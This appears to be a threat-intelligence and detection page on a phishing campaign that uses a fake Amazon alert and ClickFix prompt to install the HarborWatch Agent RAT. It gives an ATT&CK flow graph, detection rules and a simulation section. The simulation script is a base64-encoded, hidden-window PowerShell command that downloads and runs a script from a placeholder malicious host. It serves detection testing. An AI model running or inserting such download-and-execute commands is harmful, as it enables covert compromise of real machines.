Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
The report details a phishing campaign built around a fake Amazon security alert that tricks victims into running a PowerShell command through a ClickFix-style prompt. That command downloads a malicious executable named mysql.exe, which is in fact the HarborWatch Agent RAT. Once launched, the malware connects to a command-and-control server and transmits host information. The operation relies on look-alike domains and a user-driven self-infection method to avoid traditional attachment-based detection.
Investigation
Cofense traced the campaign from the spoofed sender address through the malicious domains, the PowerShell downloader, and the final malware payload. Dynamic analysis of mysql.exe revealed outbound communication with a command-and-control server at 185.193.127.44 and use of the API paths /api/agent/tasks/ and /api/heartbeat. Memory analysis also exposed the identifier HarborWatchAgent/c-1.1.1.
Mitigation
Organizations should block the identified malicious domains and IP addresses, restrict PowerShell execution of encoded commands, monitor for unexpected creation of mysql.exe in the Temp directory, and strengthen email defenses against brand impersonation and spoofed alerts.
Response
If this activity is detected, isolate the affected endpoint, terminate the HarborWatch Agent process, collect forensic evidence, and deploy indicator-based blocking across the environment. Users should also be warned about the fake Amazon security alert, and phishing protections should be updated to catch similar lures.
"graph TB %% Class definitions classDef action fill:#99ccff classDef malware fill:#ff6666 classDef process fill:#ffcc99 classDef file fill:#cccccc %% Nodes initial_access_phishing["<b>Action</b> – <b>T1566.002 Spearphishing Link</b><br/>Email appears to be from Amazon and contains a malicious verification link."] class initial_access_phishing action user_execution_malicious_link["<b>Action</b> – <b>T1204.001 User Execution: Malicious Link</b><br/>Victim clicks the link and is taken to a page that instructs them to copyu2011paste a PowerShell command."] class user_execution_malicious_link action user_execution_copy_paste["<b>Action</b> – <b>T1204.004 User Execution: Copy and Paste</b><br/>Copied PowerShell command is executed locally."] class user_execution_copy_paste action obfuscation_obfuscated_files["<b>Action</b> – <b>T1027 Obfuscated Files or Information</b> & <b>T1027.018 Invisible Unicode</b><br/>PowerShell command is base64u2011encoded and contains hidden Unicode characters."] class obfuscation_obfuscated_files action deobfuscate_decode["<b>Action</b> – <b>T1140 Deobfuscate/Decode Files or Information</b><br/>Command decodes the payload at runtime."] class deobfuscate_decode action hide_artifact_hidden_window["<b>Action</b> – <b>T1564.003 Hidden Window</b><br/>PowerShell runs with -w hidden to avoid UI."] class hide_artifact_hidden_window action ingress_tool_transfer["<b>Action</b> – <b>T1105 Ingress Tool Transfer</b><br/>Script downloads a secondu2011stage PowerShell script (code.txt) from a remote server."] class ingress_tool_transfer action server_software_component["<b>Action</b> – <b>T1505 Server Software Component</b><br/>Second script retrieves and executes a payload (mysql.exe) placed in %TEMP%."] class server_software_component action remote_access_tool["<b>Malware</b> – <b>T1219 Remote Access Tool</b><br/>Custom RAT named HarborWatch Agent is executed."] class remote_access_tool malware discovery_security_software["<b>Action</b> – <b>T1518.001 Security Software Discovery</b><br/>RAT collects security software information."] class discovery_security_software action discovery_hardware["<b>Action</b> – <b>T1592.001 Hardware Discovery</b><br/>RAT gathers hardware details of the host."] class discovery_hardware action discovery_network_appliances["<b>Action</b> – <b>T1590.006 Network Security Appliances</b><br/>RAT enumerates network security devices."] class discovery_network_appliances action discovery_log_enumeration["<b>Action</b> – <b>T1654 Log Enumeration</b><br/>RAT enumerates event logs."] class discovery_log_enumeration action discovery_threat_vendor["<b>Action</b> – <b>T1681 Search Threat Vendor Data</b><br/>RAT searches for threat intelligence."] class discovery_threat_vendor action c2_bidirectional["<b>Action</b> – <b>T1102.002 Web Service Bidirectional Communication</b><br/>Data is sent to C2 server via HTTPS."] class c2_bidirectional action c2_oneway["<b>Action</b> – <b>T1102.003 Web Service Oneu2011Way Communication</b><br/>Additional instructions retrieved via HTTPS."] class c2_oneway action c2_dynamic_resolution["<b>Action</b> – <b>T1568 Dynamic Resolution</b><br/>RAT resolves C2 domains at runtime."] class c2_dynamic_resolution action c2_dga["<b>Action</b> – <b>T1568.002 Domain Generation Algorithms</b><br/>Domain list generated algorithmically."] class c2_dga action c2_dead_drop_resolver["<b>Action</b> – <b>T1102.001 Dead Drop Resolver</b><br/>Retrieves extra C2 instructions from deadu2011drop site."] class c2_dead_drop_resolver action exfiltration_c2["<b>Action</b> – <b>T1041 Exfiltration Over C2 Channel</b><br/>Collected information exfiltrated through the same web channel."] class exfiltration_c2 action exfiltration_alternative["<b>Action</b> – <b>T1048 Exfiltration Over Alternative Protocol</b><br/>Alternative protocol used for data exfiltration."] class exfiltration_alternative action discovery_cloud_dashboard["<b>Action</b> – <b>T1538 Cloud Service Dashboard</b><br/>Data displayed on Chineseu2011language web panel (Harbor Sentinel)."] class discovery_cloud_dashboard action %% Connections initial_access_phishing –>|leads to| user_execution_malicious_link user_execution_malicious_link –>|leads to| user_execution_copy_paste user_execution_copy_paste –>|triggers| obfuscation_obfuscated_files obfuscation_obfuscated_files –>|decoded by| deobfuscate_decode deobfuscate_decode –>|executes| hide_artifact_hidden_window hide_artifact_hidden_window –>|downloads| ingress_tool_transfer ingress_tool_transfer –>|downloads| server_software_component server_software_component –>|executes| remote_access_tool remote_access_tool –>|performs| discovery_security_software remote_access_tool –>|performs| discovery_hardware remote_access_tool –>|performs| discovery_network_appliances remote_access_tool –>|performs| discovery_log_enumeration remote_access_tool –>|performs| discovery_threat_vendor remote_access_tool –>|communicates via| c2_bidirectional remote_access_tool –>|receives via| c2_oneway c2_bidirectional –>|uses| c2_dynamic_resolution c2_dynamic_resolution –>|uses| c2_dga c2_oneway –>|uses| c2_dead_drop_resolver remote_access_tool –>|exfiltrates via| exfiltration_c2 exfiltration_c2 –>|may also use| exfiltration_alternative remote_access_tool –>|reports to| discovery_cloud_dashboard "
Attack Flow
Detections
Possible ClickFix Attack Patterns In Command Line (via cmdline)
View
The Possibility of Execution Through Hidden PowerShell Command Lines (via cmdline)
View
Suspicious Powershell Strings (via cmdline)
View
Suspicious Powershell Strings (via powershell)
View
Call Suspicious .NET Methods from Powershell (via powershell)
View
IOCs (HashSha256) to detect: From Fake Amazon Security Alert to HarborWatch Agent ClickFix Delivery of a Custom Monitoring RAT
View
IOCs (HashMd5) to detect: From Fake Amazon Security Alert to HarborWatch Agent ClickFix Delivery of a Custom Monitoring RAT
View
IOCs (SourceIP) to detect: From Fake Amazon Security Alert to HarborWatch Agent ClickFix Delivery of a Custom Monitoring RAT
View
IOCs (DestinationIP) to detect: From Fake Amazon Security Alert to HarborWatch Agent ClickFix Delivery of a Custom Monitoring RAT
View
Execution of mysql.exe with Specific Password Argument [Windows Process Creation]
View
HarborWatch Agent C2 Communication Detection [Windows Network Connection]
View
Detect PowerShell Execution with Obfuscation and Hidden Window [Windows Powershell]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
-
Attack Narrative & Commands:
An attacker has obtained a foothold on the endpoint and wishes to download and execute a malicious payload while remaining hidden from the user. They craft a PowerShell one‑liner that:- Runs without a profile (
-nop) to avoid loading user profiles. - Starts in a hidden window (
-w hidden) to prevent UI exposure (T1564.003). - Embeds a base64‑encoded reverse‑shell script to evade simple string detection (T1027.010).
- Executes the decoded script via
-EncodedCommand, leveraging PowerShell as a signed binary (T1218).
The crafted command line matches the Sigma rule’s
CommandLine|containsfilters, thereby generating the expected alert. - Runs without a profile (
-
Regression Test Script:
# ------------------------------------------------- # Malicious PowerShell execution that should trigger the Sigma rule # ------------------------------------------------- $payload = 'IEX (New-Object Net.WebClient).DownloadString("http://malicious.example.com/payload.ps1")' $b64 = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload)) $cmd = "-nop -w hidden -EncodedCommand $b64" Start-Process -FilePath "$env:SystemRootSystem32WindowsPowerShellv1.0powershell.exe" ` -ArgumentList $cmd ` -WindowStyle Hidden # End of script -
Cleanup Commands:
# Terminate any lingering malicious PowerShell processes Get-Process -Name powershell -ErrorAction SilentlyContinue | Stop-Process -Force # Remove any temporary files (none created in this case) # Delete the base64 payload variable from the session (optional) Remove-Variable -Name b64 -ErrorAction SilentlyContinue